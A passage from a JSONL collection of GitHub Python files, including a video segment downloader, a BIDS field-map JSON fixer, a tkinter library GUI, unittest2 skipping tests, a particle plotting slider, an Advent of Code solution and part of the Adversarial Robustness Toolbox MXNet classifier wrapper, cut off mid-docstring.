\\\n str(i).zfill(len(self.max_munber)) + \".ts\"\n pool.submit(self.download_thread, link)\n pool.shutdown()\n # 所有的ts文件合并为mp4文件并删除原有ts文件\n os.system(\"copy /b %s %s\" % (self.path1, self.path2))\n os.system(\"del %s\" % self.path1)\n\n\nif __name__ == '__main__':\n # 接受终端的传参,支持多个下载链接\n download_urls = sys.argv[1:]\n for url in download_urls:\n downloader = JDonwload(url)\n downloader.download()\n","repo_name":"xyexiao/tools","sub_path":"jj_download.py","file_name":"jj_download.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7207668382","text":"#! /usr/bin/env python3\n'''\ncorrect field map json\n'''\n \nimport os\nimport sys\nimport json\nimport glob\nimport collections\n\ndef correctFieldMapJson(bids_dir,sub,ses=None):\n \n if ses: #ses not None\n sub_prefix = '{}_{}'.format(sub,ses)\n sub_path_prefix=os.path.join(sub,ses)\n sub_root = '{}'.format(sub)\n else:\n sub_prefix = '{}'.format(sub)\n sub_path_prefix = sub_prefix\n sub_root = '{}'.format(sub)\n \n sub_dir=os.path.join(bids_dir,sub_path_prefix)\n sub_root_dir=os.path.join(bids_dir,sub_root) #without session\n\n phasediff_json_file=os.path.join(sub_dir,'fmap','{}_phasediff.json'.format(sub_prefix))\n mag1_json_file=os.path.join(sub_dir,'fmap','{}_magnitude1.json'.format(sub_prefix))\n mag2_json_file=os.path.join(sub_dir,'fmap','{}_magnitude2.json'.format(sub_prefix))\n\n #debug\n # print phasediff_json_file\n # print mag1_json_file\n # print mag2_json_file\n\n #load json files\n with open(phasediff_json_file, 'r') as f:\n phasediff_json = json.load(f,object_pairs_hook=collections.OrderedDict)\n\n with open(mag1_json_file, 'r') as f:\n mag1_json = json.load(f)\n\n with open(mag2_json_file, 'r') as f:\n mag2_json = json.load(f)\n\n #add items\n phasediff_json['EchoTime1'] = mag1_json['EchoTime']\n phasediff_json['EchoTime2'] = mag2_json['EchoTime']\n\n #debug\n # print phasediff_json['EchoTime1']\n # print phasediff_json['EchoTime2']\n\n # apply to all bold images\n cwd=os.getcwd()\n os.chdir(sub_root_dir)\n if ses:\n all_bold = glob.glob(os.path.join('{}'.format(ses),'func','{}_*_bold.nii.gz'.format(sub_prefix)))\n else:\n all_bold = glob.glob(os.path.join('func','{}_*_bold.nii.gz'.format(sub_prefix)))\n\n os.chdir(cwd)\n phasediff_json[\"IntendedFor\"]=all_bold\n\n #debug\n #print phasediff_json[\"IntendedFor\"]\n\n #update json file\n os.system(\"chmod a+w {}\".format(phasediff_json_file))\n with open(phasediff_json_file, 'w') as f:\n json.dump(phasediff_json, f, indent=4, separators=(',', ': '))\n os.system(\"chmod a-w {}\".format(phasediff_json_file))\n\n\nif __name__==\"__main__\":\n if len(sys.argv)-1 < 2:\n print (\"Usage: python \" + os.path.basename(__file__)+ \" 'bids_dir' 'sub' 'ses (optional)'\")\n sys.exit()\n else:\n bids_dir = sys.argv[1]\n sub = sys.argv[2]\n if len(sys.argv)-1 > 2:\n ses=sys.argv[3]\n correctFieldMapJson(bids_dir,sub,ses)\n else:\n correctFieldMapJson(bids_dir,sub)\n\n#test\n#Usage: python correctFieldMapJson.py 'bids_dir' 'sub'\n#python correctFieldMapJson.py '/mnt/hgfs/test/correct_fieldmap_json/topsy_7T' 'sub-005'\n","repo_name":"khanlab/tar2bids","sub_path":"etc/correctFieldMapJson.py","file_name":"correctFieldMapJson.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"8906309163","text":"'''#\"This file is not included in the main system.\n This file is still a work in progress.\"\n#'''\nfrom pathlib import Path\nimport tkinter as tk\nfrom tkinter import ttk, Tk, Canvas, Entry, Text, Button, PhotoImage, font\n\nOUTPUT_PATH = Path(__file__).parent\nASSETS_PATH = OUTPUT_PATH / \"assets\" / \"DisplayBook\"\n\ndef relative_to_assets(path: str) -> Path:\n return ASSETS_PATH / Path(path)\n\nclass DisplayTableFrame(ttk.Frame):\n def __init__(self, parent):\n super().__init__(parent)\n self.table = ttk.Treeview(self, columns=('Title', 'Edition', 'Author', 'Year', 'ISBN',\n 'Material', 'Category', 'Shelf No.', 'Total Stock',\n 'No. of Borrowers'), show='headings')\n self.table.heading('Title', text='Title')\n self.table.heading('Edition', text='Edition')\n self.table.heading('Author', text='Author')\n self.table.heading('Year', text='Year')\n self.table.heading('ISBN', text='ISBN')\n self.table.heading('Material', text='Material')\n self.table.heading('Category', text='Category')\n self.table.heading('Shelf No.', text='Shelf No.')\n self.table.heading('Total Stock', text='Total Stock')\n self.table.heading('No. of Borrowers', text='No. of Borrowers')\n\n self.table.column('Title', width=150)\n self.table.column('Edition', width=50)\n self.table.column('Author', width=120)\n self.table.column('Year', width=50)\n self.table.column('ISBN', width=100)\n self.table.column('Material', width=100)\n self.table.column('Category', width=120)\n self.table.column('Shelf No.', width=50)\n self.table.column('Total Stock', width=50)\n self.table.column('No. of Borrowers', width=50)\n\n self.table.pack(side='left', fill='y')\n\nclass DisplayBookFrame(tk.Frame):\n def __init__(self, parent):\n super().__init__(parent)\n\n self.canvas = tk.Canvas(self) # Initialize the canvas attribute\n self.canvas.pack(fill='both', expand=True) # Pack the canvas widget\n\n # DISPLAY ALL BOOKS\n button_image_1 = PhotoImage(\n file=relative_to_assets(\"button_1.png\"))\n button_1 = Button(\n image=button_image_1,\n borderwidth=0,\n highlightthickness=0,\n command=lambda: print(\"button_1 clicked\"),\n relief=\"flat\"\n )\n button_1.place(x=20.0, y=145.0, width=160.0, height=32.0)\n\n # SEARCH BOOK\n '''#\n def gotoSearchBook():\n window.destroy()\n current_directory = os.path.dirname(os.path.abspath(__file__))\n script_path = os.path.join(current_directory, \"studentDispBookFrame.py\")\n subprocess.run([\"python\", script_path])\n '''\n button_image_2 = PhotoImage(file=relative_to_assets(\"button_2.png\"))\n button_2 = Button(\n image=button_image_2,\n borderwidth=0,\n highlightthickness=0,\n command=lambda: print(\"button_2 clicked\"),\n relief=\"flat\"\n )\n button_2.place(x=20.0, y=199.0, width=160.0, height=32.0)\n\n # BORROW BOOK\n '''#\n def gotoBorrowBook():\n window.destroy()\n current_directory = os.path.dirname(os.path.abspath(__file__))\n script_path = os.path.join(current_directory, \"studentDispBookFrame.py\")\n subprocess.run([\"python\", script_path])\n '''\n borrowButton = PhotoImage(file=relative_to_assets(\"button_3.png\"))\n button_3 = Button(\n image=borrowButton,\n borderwidth=0,\n highlightthickness=0,\n command=lambda: print(\"button_3 clicked\"),\n relief=\"flat\"\n )\n button_3.place(x=20.0, y=253.0, width=160.0, height=32.0)\n\n image_image_1 = PhotoImage(file=relative_to_assets(\"image_1.png\"))\n self.image_1 = self.canvas.create_image(99.0, 59.0, image=image_image_1)\n\n self.canvas.create_text(\n 219.0,\n 17.0,\n anchor=\"nw\",\n text=\"BOOK\",\n fill=\"#4B0000\",\n font=font.Font(family=\"Poppins\", size=40, weight=\"bold\")\n )\n\n notifButton = PhotoImage(file=relative_to_assets(\"image_2.png\"))\n self.image_2 = self.canvas.create_image(\n 1012.0,\n 51.0,\n image=notifButton\n )\n\n '''#\n def gotoHome():\n window.destroy()\n current_directory = os.path.dirname(os.path.abspath(__file__))\n script_path = os.path.join(current_directory, \"studentDispBookFrame.py\")\n subprocess.run([\"python\", script_path])\n '''\n homeImage = PhotoImage(\n file=relative_to_assets(\"image_3.png\"))\n self.image_3 = self.canvas.create_image(\n 945.0,\n 52.0,\n image=homeImage\n )\n\n '''#\n def gotoLogout():\n window.destroy()\n current_directory = os.path.dirname(os.path.abspath(__file__))\n script_path = os.path.join(current_directory, \"studentDispBookFrame.py\")\n subprocess.run([\"python\", script_path])\n '''\n logoutImage = PhotoImage(file=relative_to_assets(\"image_4.png\"))\n self.image_4 = self.canvas.create_image(1075.0, 51.0, image=logoutImage)\n\n button_image_4 = PhotoImage(\n file=relative_to_assets(\"button_4.png\"))\n button_4 = Button(\n image=button_image_4,\n borderwidth=0,\n highlightthickness=0,\n command=lambda: print(\"button_4 clicked\"),\n relief=\"flat\"\n )\n button_4.place(\n x=759.0,\n y=38.0,\n width=80.0,\n height=37.0\n )\n\n # TEXTBOX\n entry_image_1 = PhotoImage(file=relative_to_assets(\"entry_1.png\"))\n self.entry_bg_1 = self.canvas.create_image(577.5, 56.5, image=entry_image_1)\n entry_1 = Entry(\n bd=0,\n bg=\"#FFFDFD\",\n fg=\"#000716\",\n highlightthickness=0\n )\n entry_1.place(\n x=405.0,\n y=40.0,\n width=350.0,\n height=33.0\n )\n\n image_image_5 = PhotoImage(\n file=relative_to_assets(\"image_5.png\"))\n self.image_5 = self.canvas.create_image(\n 640.0,\n 380.0,\n image=image_image_5\n )\n\n self.frame1 = DisplayTableFrame(parent)\n self.frame1.place(x=220, y=150)\n '''\n # adding data to the table\n for i in range(len(titles)):\n table.insert('', 'end', values=(titles[i], editions[i], authors[i], years[i], isbns[i], materials[i], categories[i], shelf_nos[i], total_stocks[i], no_of_borrowers[i]))\n '''\n\n # CATEGORY DROPDOWN\n button_image_5 = PhotoImage(\n file=relative_to_assets(\"button_5.png\"))\n button_5 = Button(\n image=button_image_5,\n borderwidth=0,\n highlightthickness=0,\n command=lambda: print(\"button_5 clicked\"),\n relief=\"flat\"\n )\n button_5.place(\n x=907.0,\n y=100.0,\n width=173.0,\n height=20.0\n )\n\n image_image_6 = PhotoImage(file=relative_to_assets(\"image_6.png\"))\n image_6 = self.canvas.create_image(250.0, 599.0, image=image_image_6)\n # Move the image to the bottom of the stacking order\n self.canvas.lower(image_6)\n\n\nclass SearchandBorrow(ttk.Frame):\n def __init__(self, parent):\n super().__init__(parent)\n # Add your borrow book frame code here\n\nclass ChangePassword(ttk.Frame):\n def __init__(self, parent):\n super().__init__(parent)\n # Add your borrow book frame code here\n\n\nclass StudentMainFrame(tk.Tk):\n def __init__(self):\n super().__init__()\n self.title(\"Student Main Frame\")\n self.geometry(\"1125x670\")\n self.configure(bg=\"#FFFFFF\")\n self.create_subframes()\n self.center_window()\n\n def create_subframes(self):\n self.displayBook = DisplayBookFrame(self)\n # Place the search book frame wherever you want\n\n self.searchBorrow = SearchandBorrow(self)\n # Place the borrow book frame wherever you want\n\n self.changePassword = ChangePassword(self)\n # Place the borrow book frame wherever you want\n\n # Add your other main window widgets here\n\n def center_window(self):\n # Calculate the center coordinates of the screen\n screen_width = self.winfo_screenwidth()\n screen_height = self.winfo_screenheight()\n x = (screen_width - 1125) // 2\n y = (screen_height - 670) // 2\n\n # Set the window position to the center of the screen\n self.geometry(f\"+{x}+{y}\")\n\nif __name__ == \"__main__\":\n root = StudentMainFrame()\n root.mainloop()\n\n","repo_name":"ms-hollow/PL-LIBRARY-SYSTEM-PYTHON","sub_path":"build/StudentPortal.py","file_name":"StudentPortal.py","file_ext":"py","file_size_in_byte":8915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11628855539","text":"from unittest2.test.support import LoggingResult\n\nimport unittest2\n\n\nclass Test_TestSkipping(unittest2.TestCase):\n\n def test_skipping(self):\n class Foo(unittest2.TestCase):\n\n def test_skip_me(self):\n self.skipTest(\"skip\")\n events = []\n result = LoggingResult(events)\n test = Foo(\"test_skip_me\")\n test.run(result)\n self.assertEqual(events, ['startTest', 'addSkip', 'stopTest'])\n self.assertEqual(result.skipped, [(test, \"skip\")])\n\n # Try letting setUp skip the test now.\n class Foo(unittest2.TestCase):\n\n def setUp(self):\n self.skipTest(\"testing\")\n\n def test_nothing(self): pass\n events = []\n result = LoggingResult(events)\n test = Foo(\"test_nothing\")\n test.run(result)\n self.assertEqual(events, ['startTest', 'addSkip', 'stopTest'])\n self.assertEqual(result.skipped, [(test, \"testing\")])\n self.assertEqual(result.testsRun, 1)\n\n def test_skipping_decorators(self):\n op_table = ((unittest2.skipUnless, False, True),\n (unittest2.skipIf, True, False))\n for deco, do_skip, dont_skip in op_table:\n class Foo(unittest2.TestCase):\n\n @deco(do_skip, \"testing\")\n def test_skip(self):\n pass\n\n @deco(dont_skip, \"testing\")\n def test_dont_skip(self):\n pass\n\n test_do_skip = Foo(\"test_skip\")\n test_dont_skip = Foo(\"test_dont_skip\")\n suite = unittest2.TestSuite([test_do_skip, test_dont_skip])\n events = []\n result = LoggingResult(events)\n suite.run(result)\n self.assertEqual(len(result.skipped), 1)\n expected = ['startTest', 'addSkip', 'stopTest',\n 'startTest', 'addSuccess', 'stopTest']\n self.assertEqual(events, expected)\n self.assertEqual(result.testsRun, 2)\n self.assertEqual(result.skipped, [(test_do_skip, \"testing\")])\n self.assertTrue(result.wasSuccessful())\n\n def test_skip_class(self):\n class Foo(unittest2.TestCase):\n\n def test_1(self):\n record.append(1)\n\n # was originally a class decorator...\n Foo = unittest2.skip(\"testing\")(Foo)\n record = []\n result = unittest2.TestResult()\n test = Foo(\"test_1\")\n suite = unittest2.TestSuite([test])\n suite.run(result)\n self.assertEqual(result.skipped, [(test, \"testing\")])\n self.assertEqual(record, [])\n\n def test_expected_failure(self):\n class Foo(unittest2.TestCase):\n\n @unittest2.expectedFailure\n def test_die(self):\n self.fail(\"help me!\")\n events = []\n result = LoggingResult(events)\n test = Foo(\"test_die\")\n test.run(result)\n self.assertEqual(events,\n ['startTest', 'addExpectedFailure', 'stopTest'])\n self.assertEqual(result.expectedFailures[0][0], test)\n self.assertTrue(result.wasSuccessful())\n\n def test_unexpected_success(self):\n class Foo(unittest2.TestCase):\n\n @unittest2.expectedFailure\n def test_die(self):\n pass\n events = []\n result = LoggingResult(events)\n test = Foo(\"test_die\")\n test.run(result)\n self.assertEqual(events,\n ['startTest', 'addUnexpectedSuccess', 'stopTest'])\n self.assertFalse(result.failures)\n self.assertEqual(result.unexpectedSuccesses, [test])\n self.assertTrue(result.wasSuccessful())\n\n def test_skip_doesnt_run_setup(self):\n class Foo(unittest2.TestCase):\n wasSetUp = False\n wasTornDown = False\n\n def setUp(self):\n Foo.wasSetUp = True\n\n def tornDown(self):\n Foo.wasTornDown = True\n\n @unittest2.skip('testing')\n def test_1(self):\n pass\n\n result = unittest2.TestResult()\n test = Foo(\"test_1\")\n suite = unittest2.TestSuite([test])\n suite.run(result)\n self.assertEqual(result.skipped, [(test, \"testing\")])\n self.assertFalse(Foo.wasSetUp)\n self.assertFalse(Foo.wasTornDown)\n\n def test_decorated_skip(self):\n def decorator(func):\n def inner(*a):\n return func(*a)\n return inner\n\n class Foo(unittest2.TestCase):\n\n @decorator\n @unittest2.skip('testing')\n def test_1(self):\n pass\n\n result = unittest2.TestResult()\n test = Foo(\"test_1\")\n suite = unittest2.TestSuite([test])\n suite.run(result)\n self.assertEqual(result.skipped, [(test, \"testing\")])\n\n\nif __name__ == '__main__':\n unittest2.main()\n","repo_name":"llvm/llvm-project","sub_path":"lldb/third_party/Python/module/unittest2/unittest2/test/test_skipping.py","file_name":"test_skipping.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","stars":22888,"dataset":"github-code","pt":"66"} +{"seq_id":"37502577572","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider, Button, RadioButtons\n\nimport csv\n\nparticle_data = {}\ntrajectory_data = {}\n\ndef main():\n # key is timestamp\n\n\n with open(\"particles.csv\") as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n t = float(row[0])\n s = float(row[1])\n v = float(row[2])\n m = int(row[3])\n dist = int(row[4])\n if t not in particle_data:\n particle_data[t] = {}\n if dist not in particle_data[t]:\n particle_data[t][dist] = {}\n if m not in particle_data[t][dist]:\n particle_data[t][dist][m] = []\n particle_data[t][dist][m].append((s,v))\n\n # ego_s = []\n # ego_v = []\n # obj_s = []\n # obj_v = []\n # with open(\"trajectories.csv\") as csvfile:\n # reader = csv.reader(csvfile)\n # for row in reader:\n # ego_s.append(float(row[0]))\n # ego_v.append(float(row[1]))\n # obj_s.append(float(row[2]))\n # obj_v.append(float(row[3]))\n\n\n fig, ax = plt.subplots()\n plt.subplots_adjust(left=0.25, bottom=0.25)\n\n plt.xlim(-30, 200)\n plt.ylim(0,35)\n\n distToPlot = 1 # intermediate\n scat0 = plt.scatter([el[0] for el in particle_data[1.5][distToPlot][0]],\n [el[1] for el in particle_data[1.5][distToPlot][0]],\n s=3.0)\n scat1 = plt.scatter([el[0] for el in particle_data[1.5][distToPlot][1]],\n [el[1] for el in particle_data[1.5][distToPlot][1]],\n s=3.0)\n scat2 = plt.scatter([el[0] for el in particle_data[1.5][distToPlot][2]],\n [el[1] for el in particle_data[1.5][distToPlot][2]],\n s=3.0)\n\n # these plots are fixed and wont move with slider\n # these don't quite look right.\n # plt.plot(ego_s, ego_v)\n # plt.plot(obj_s, obj_v)\n\n ax.margins(x=0)\n\n t0 = 1.5\n delta_t = 0.5\n\n axcolor = 'lightgoldenrodyellow'\n axtime = plt.axes([0.25, 0.1, 0.65, 0.03], facecolor=axcolor)\n\n time = Slider(axtime, 'timestep', 1.5, 10.0, valinit=t0, valstep=delta_t)\n\n def update(time):\n print(time)\n x = [el[0] for el in particle_data[time][distToPlot][0]]\n y = [el[1] for el in particle_data[time][distToPlot][0]]\n xx = np.vstack((x,y))\n scat0.set_offsets(xx.T)\n\n x = [el[0] for el in particle_data[time][distToPlot][1]]\n y = [el[1] for el in particle_data[time][distToPlot][1]]\n xx = np.vstack((x,y))\n scat1.set_offsets(xx.T)\n\n x = [el[0] for el in particle_data[time][distToPlot][2]]\n y = [el[1] for el in particle_data[time][distToPlot][2]]\n xx = np.vstack((x,y))\n scat2.set_offsets(xx.T)\n\n\n fig.canvas.draw_idle()\n\n\n time.on_changed(update)\n\n plt.legend()\n plt.show()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"markmliu/hackathon","sub_path":"particles_slider.py","file_name":"particles_slider.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"12954673151","text":"input = []\nvisited = []\n\nwith open(\"input.txt\", mode=\"r\") as file:\n for line in file:\n input.append(int(line))\n\n# INEFFICIENT AF. DO NOT LOOK AT THIS TOO MUCH :P\n\nfor num1 in input:\n for num2 in input:\n for num3 in input:\n if (num1+num2+num3 == 2020) and (num1 != num2 != num3):\n print(num1*num2*num3)\n break;\n","repo_name":"ThePituLegend/advent-of-code-2020","sub_path":"day1/day1_2.py","file_name":"day1_2.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"16557484232","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\nimport os\nfrom typing import List, Optional, Tuple, Union, TYPE_CHECKING\n\nimport numpy as np\nimport six\n\nfrom art import config\nfrom art.estimators.mxnet import MXEstimator\nfrom art.estimators.classification.classifier import ClassGradientsMixin, ClassifierMixin\nfrom art.utils import check_and_transform_label_format\n\nif TYPE_CHECKING:\n # pylint: disable=C0412\n import mxnet as mx\n\n from art.utils import CLIP_VALUES_TYPE, PREPROCESSING_TYPE\n from art.data_generators import DataGenerator\n from art.defences.preprocessor import Preprocessor\n from art.defences.postprocessor import Postprocessor\n\nlogger = logging.getLogger(__name__)\n\n\nclass MXClassifier(ClassGradientsMixin, ClassifierMixin, MXEstimator):\n \"\"\"\n Class for importing MXNet Gluon models.\n \"\"\"\n\n estimator_params = (\n MXEstimator.estimator_params\n + ClassifierMixin.estimator_params\n + [\n \"loss\",\n \"input_shape\",\n \"nb_classes\",\n \"optimizer\",\n \"ctx\",\n \"channels_first\",\n ]\n )\n\n def __init__(\n self,\n model: \"mx.gluon.Block\",\n loss: Union[\"mx.nd.loss\", \"mx.gluon.loss\"],\n input_shape: Tuple[int, ...],\n nb_classes: int,\n optimizer: Optional[\"mx.gluon.Trainer\"] = None,\n ctx: Optional[\"mx.context.Context\"] = None,\n channels_first: bool = True,\n clip_values: Optional[\"CLIP_VALUES_TYPE\"] = None,\n preprocessing_defences: Union[\"Preprocessor\", List[\"Preprocessor\"], None] = None,\n postprocessing_defences: Union[\"Postprocessor\", List[\"Postprocessor\"], None] = None,\n preprocessing: \"PREPROCESSING_TYPE\" = (0.0, 1.0),\n ) -> None:\n \"\"\"\n Initialize an `MXClassifier` object. Assumes the `model` passed as parameter is a Gluon model.\n\n :param model: The Gluon model. The output of the model can be logits, probabilities or anything else. Logits\n output should be preferred where possible to ensure attack efficiency.\n :param loss: The loss function for which to compute gradients for training.\n :param input_shape: The shape of one input instance.\n :param nb_classes: The number of classes of the model.\n :param optimizer: The optimizer used to train the classifier. This parameter is only required if fitting will\n be done with method fit.\n :param ctx: The device on which the model runs (CPU or GPU). If not provided, CPU is assumed.\n :param channels_first: Set channels first or last.\n :param clip_values: Tuple of the form `(min, max)` of floats or `np.ndarray` representing the minimum and\n maximum values allowed for features. If floats are provided, these will be used as the range of all\n features. If arrays are provided, each value will be considered the bound for a feature, thus\n the shape of clip values needs to match the total number of features.\n :param preprocessing_defences: Preprocessing defence(s) to be applied by the classifier.\n :param postprocessing_defences: Postprocessing defence(s) to be applied by the classifier.\n :param preprocessing: Tuple of the form `(subtrahend, divisor)` of floats or `np.ndarray` of values to be\n used for data preprocessing. The first value will be subtracted from the input. The input will then\n be divided by the second one.\n \"\"\"\n import mxnet as mx\n\n super().__init__(\n model=model,\n clip_values=clip_values,\n channels_first=channels_first,\n preprocessing_defences=preprocessing_defences,\n postprocessing_defences=postprocessing_defences,\n preprocessing=preprocessing,\n )\n\n self._loss = loss\n self.nb_classes = nb_classes\n self._input_shape = input_shape\n self._device = ctx\n self._optimizer = optimizer\n\n if ctx is None:\n self._ctx = mx.cpu()\n else:\n self._ctx = ctx\n\n # Get the internal layer\n self._layer_names = self._get_layers()\n\n @property\n def input_shape(self) -> Tuple[int, ...]:\n \"\"\"\n Return the shape of one input sample.\n\n :return: Shape of one input sample.\n \"\"\"\n return self._input_shape # type: ignore\n\n @property\n def loss(self) -> Union[\"mx.nd.loss\", \"mx.gluon.loss\"]:\n \"\"\"\n Return the loss function.\n\n :return: The loss function.\n \"\"\"\n return self._loss # type: ignore\n\n @property\n def optimizer(self) -> \"mx.gluon.Trainer\":\n \"\"\"\n Return the optimizer used to train the classifier.\n\n :return: The optimizer used to train the classifier.\n \"\"\"\n return self._optimizer # type: ignore\n\n @property\n def ctx(self) -> \"mx.context.Context\":\n \"\"\"\n Return the device on which the model runs.\n\n :return: The device on which the model runs (CPU or GPU).\n \"\"\"\n return self._ctx # type: ignore\n\n def fit(\n self, x: np.ndarray, y: np.ndarray, batch_size: int = 128, nb_epochs: int = 20, **kwargs\n ) -> None: # pragma: no cover\n \"\"\"\n Fit the classifier on the training set `(inputs, outputs)`.\n\n :param x: Training data.\n :param y: Target values (class labels) one-hot-encoded of shape (nb_samples, nb_classes) or index labels of\n shape (nb_samples,).\n :param batch_size: Size of batches.\n :param nb_epochs: Number of epochs to use for training.\n :param kwargs: Dictionary of framework-specific arguments. This parameter is not currently supported for MXNet\n and providing it takes no effect.\n \"\"\"\n import mxnet as mx\n\n if self.optimizer is None:\n raise ValueError(\"An MXNet optimizer is required for fitting the model.\")\n\n training_mode = True\n\n y = check_and_transform_label_format(y, nb_classes=self.nb_classes)\n\n # Apply preprocessing\n x_preprocessed, y_preprocessed = self._apply_preprocessing(x, y, fit=True)\n y_preprocessed = np.argmax(y_preprocessed, axis=1)\n nb_batch = int(np.ceil(len(x_preprocessed) / batch_size))\n ind = np.arange(len(x_preprocessed))\n\n for _ in range(nb_epochs):\n # Shuffle the examples\n np.random.shuffle(ind)\n\n # Train for one epoch\n for m in range(nb_batch):\n x_batch = mx.nd.array(\n x_preprocessed[ind[m * batch_size : (m + 1) * batch_size]].astype(config.ART_NUMPY_DTYPE)\n ).as_in_context(self.ctx)\n y_batch = mx.nd.array(y_preprocessed[ind[m * batch_size : (m + 1) * batch_size]]).as_in_context(\n self.ctx\n )\n\n with mx.autograd.record(train_mode=training_mode):\n # Perform prediction\n preds = self._model(x_batch)\n\n # Apply postprocessing\n preds = self._apply_postprocessing(preds=preds, fit=True)\n\n # Form the loss function\n loss = self.loss(preds, y_batch)\n\n loss.backward()\n\n # Update parameters\n self.optimizer.step(batch_size)\n\n def fit_generator(self, generator: \"DataGenerator\", nb_epochs: int = 20, **kwargs) -> None: # pragma: no cover\n \"\"\"\n Fit the classifier using the generator that yields batches as specified.\n\n :param generator: Batch generator providing `(x, y)` for each epoch.\n :param nb_epochs: Number of epochs to use for training.\n :param kwargs: Dictionary of framework-specific arguments. This parameter is not currently supported for MXNet\n and providing it takes no effect.\n \"\"\"\n import mxnet as mx\n from art.data_generators import MXDataGenerator\n\n if self.optimizer is None:\n raise ValueError(\"An MXNet optimizer is required for fitting the model.\")\n\n training_mode = True\n\n if (\n isinstance(generator, MXDataGenerator)\n and (self.preprocessing is None or self.preprocessing == [])\n and self.preprocessing == (0, 1)\n ):\n # Train directly in MXNet\n for _ in range(nb_epochs):\n for x_batch, y_batch in generator.iterator:\n x_batch = mx.nd.array(x_batch.astype(config.ART_NUMPY_DTYPE)).as_in_context(self.ctx)\n y_batch = mx.nd.argmax(y_batch, axis=1)\n y_batch = mx.nd.array(y_batch).as_in_context(self.ctx)\n\n with mx.autograd.record(train_mode=training_mode):\n # Perform prediction\n preds = self._model(x_batch)\n\n # Form the loss function\n loss = self.loss(preds, y_batch)\n\n loss.backward()\n\n # Update parameters\n self.optimizer.step(x_batch.shape[0])\n else:\n # Fit a generic data generator through the API\n super().fit_generator(generator, nb_epochs=nb_epochs)\n\n def predict( # pylint: disable=W0221\n self, x: np.ndarray, batch_size: int = 128, training_mode: bool = False, **kwargs\n ) -> np.ndarray:\n \"\"\"\n Perform prediction for a batch of inputs.\n\n :param x: Input samples.\n :param batch_size: Size of batches.\n :param training_mode: `True` for model set to training mode and `'False` for model set to evaluation mode.\n :return: Array of predictions of shape `(nb_inputs, nb_classes)`.\n \"\"\"\n import mxnet as mx\n\n # Apply preprocessing\n x_preprocessed, _ = self._apply_preprocessing(x, y=None, fit=False)\n\n # Run prediction with batch processing\n results = np.zeros((x_preprocessed.shape[0], self.nb_classes), dtype=np.float32)\n num_batch = int(np.ceil(len(x_preprocessed) / float(batch_size)))\n for m in range(num_batch):\n # Batch indexes\n begin, end = (\n m * batch_size,\n min((m + 1) * batch_size, x_preprocessed.shape[0]),\n )\n\n # Predict\n x_batch = mx.nd.array(x_preprocessed[begin:end].astype(config.ART_NUMPY_DTYPE), ctx=self.ctx)\n x_batch.attach_grad()\n with mx.autograd.record(train_mode=training_mode):\n preds = self._model(x_batch)\n\n results[begin:end] = preds.asnumpy()\n\n # Apply postprocessing\n predictions = self._apply_postprocessing(preds=results, fit=False)\n\n return predictions\n\n def class_gradient( # pylint: disable=W0221\n self,\n x: np.ndarray,\n label: Optional[Union[int, List[int], np.ndarray]] = None,\n training_mode: bool = False,\n **kwargs,\n ) -> np.ndarray:\n \"\"\"\n Compute per-class derivatives w.r.t. `x`.\n\n :param x: Sample input with shape as expected by the model.\n :param label: Index of a specific per-class derivative. If an integer is provided, the gradient of that class\n output is computed for all samples. If multiple values as provided, the first dimension should\n match the batch size of `x`, and each value will be used as target for its corresponding sample in\n `x`. If `None`, then gradients for all classes will be computed for each sample.\n :param training_mode: `True` for model set to training mode and `'False` for model set to evaluation mode.\n :return: Array of gradients of input features w.r.t. each class in the form\n `(batch_size, nb_classes, input_shape)` when computing for all classes, otherwise shape becomes\n `(batch_size, 1, input_shape)` when `label` parameter is specified.\n \"\"\"\n import mxnet as mx\n\n # Check value of label for computing gradients\n if not ( # pragma: no cover\n label is None\n or (isinstance(label, int) and label in range(self.nb_classes))\n or (\n isinstance(label, np.ndarray)\n and len(label.shape) == 1\n and (label < self.nb_classes).all()\n and label.shape[0] == x.shape[0]\n )\n ):\n raise ValueError(f\"Label {label} is out of range.\")\n\n # Apply preprocessing\n x_preprocessed, _ = self._apply_preprocessing(x, y=None, fit=False)\n x_preprocessed = mx.nd.array(x_preprocessed.astype(config.ART_NUMPY_DTYPE), ctx=self.ctx)\n x_preprocessed.attach_grad()\n\n if label is None:\n with mx.autograd.record(train_mode=False):\n preds = self._model(x_preprocessed)\n class_slices = [preds[:, i] for i in range(self.nb_classes)]\n\n grads_list = []\n for slice_ in class_slices:\n slice_.backward(retain_graph=True)\n grad = x_preprocessed.grad.asnumpy()\n grads_list.append(grad)\n grads = np.swapaxes(np.array(grads_list), 0, 1)\n elif isinstance(label, int):\n with mx.autograd.record(train_mode=training_mode):\n preds = self._model(x_preprocessed)\n class_slice = preds[:, label]\n\n class_slice.backward()\n grads = np.expand_dims(x_preprocessed.grad.asnumpy(), axis=1)\n else:\n unique_labels = list(np.unique(label))\n\n with mx.autograd.record(train_mode=training_mode):\n preds = self._model(x_preprocessed)\n class_slices = [preds[:, i] for i in unique_labels]\n\n grads_list = []\n for slice_ in class_slices:\n slice_.backward(retain_graph=True)\n grad = x_preprocessed.grad.asnumpy()\n grads_list.append(grad)\n\n grads = np.swapaxes(np.array(grads_list), 0, 1)\n lst = [unique_labels.index(i) for i in label]\n grads = grads[np.arange(len(grads)), lst]\n grads = np.expand_dims(grads, axis=1)\n\n grads = self._apply_preprocessing_gradient(x, grads)\n\n return grads\n\n def loss_gradient( # pylint: disable=W0221\n self, x: np.ndarray, y: np.ndarray, training_mode: bool = False, **kwargs\n ) -> np.ndarray:\n \"\"\"\n Compute the gradient of the loss function w.r.t. `x`.\n\n :param x: Sample input with shape as expected by the model.\n :param y: Target values (class labels) one-hot-encoded of shape `(nb_samples, nb_classes)` or indices of shape\n 